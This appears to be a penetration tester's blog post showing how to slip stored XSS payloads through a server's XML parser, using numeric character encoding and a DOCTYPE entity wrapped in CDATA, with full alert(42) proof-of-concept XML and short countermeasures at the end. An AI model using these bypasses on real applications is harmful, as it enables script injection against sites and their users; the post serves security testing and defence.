Nowadays there are numerous web application frameworks to implement a rich web application. I have already written about one of them. These frameworks usually use AJAX and XmlHttpRequests filled with either XML or JSON. In this post I will write about the XML part. In that case the first step is always to fight with the XML parser on the server-side.

Injection attacks in XML communication is always a bit uncomfortable because you cannot just write <script>:alert(42)</script> in the XML because the parser will rip it apart, since it will consider your HTML tags as XML elements. But of course nothing is lost, I will show two different techniques to trick the parser.

Unicode encoding

I have already killed the joke, but yeah the trick is using unicode encoding. That means you can take your attack string and unicode encode it first. If you don’t have an encoder on you, then you can use one on the Internet (i.e: http://www.pinnacledisplays.com/unicode-converter.htm). You will still need to URL encode it in case you want to inject it directly into the request. So here is an example:

  • in plain text: <script>:alert(42)</script>
  • after unicode encoding:
    &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
    &#97;&#108;&#101;&#114;&#116;&#40;&#52;&#50;
    &#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;
    &#116;&#62;

In my case the parser happily parsed the XML and due the the unicode encoding skipped the attack string, however in the database it was already plain-text. Although when my attack was triggered the injection was transferred again in XML but on client-side it didn’t cause any problem.

XML ENTITY

The XML entities are great stuff and allows you to do numerous different attacks such as the XML External Entity attack or the XML Entity Bomb. But here I will write about the most basic usage of it. We will create an XML entity which will hold the attack string and use that entity in the XML element where we want to inject. Of course not all parser will allow you to declare a DOCTYPE and entities, but you can simply test it. Inject the following DOCTYPE in the beginning of the XML in the request:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "foobar">
]>

And then use the new "xss" in the XML element where you want to inject. For instance if you attack the "description" field then the XML will look like the following:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "foobar">
]>
<test>
<description>&xss;</description>
</test>

If the test string appears on the UI where we injected, then the parser used the created XML entity hence all XML entity based attack are possible.

To inject HTML we have one more step to do. At this point we can inject data in the XML using entities but it will be still parsed, hence HTML code still won’t survive. The last trick is to use the "CDATA" declaration for our XML entity. It will tell the XML parser that string is not needed to be parsed. I love this trick because it’s like asking the customs officer not to look into your bag. The great is that the XML parser (not like the customs officer) will say " OK, no probs mate, off you go.". So if we want to inject the magic <script>alert(42)</script> then the XML will look like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE transaction [
<!ENTITY xss "<![CDATA[<script>alert(42)</script>]]>">
]>
<test>
<description>&xss;</description>
</test>

The parser will gladly parse everything, except the attack string, because we said so. From here it is in the database.

Countermeasures

I cannot give a straight technique how to protect against this attack, because it will mostly depend on how deep you can control how your framework handles XMLs. Still there are a few things you can try:

  • If the DOCTYPE and ENTITY is not used in your application you can try to disable it, and reject the requests that try to use them.
  • Validate the input after the XML parser.
  • Escape the output that is sent to the UI.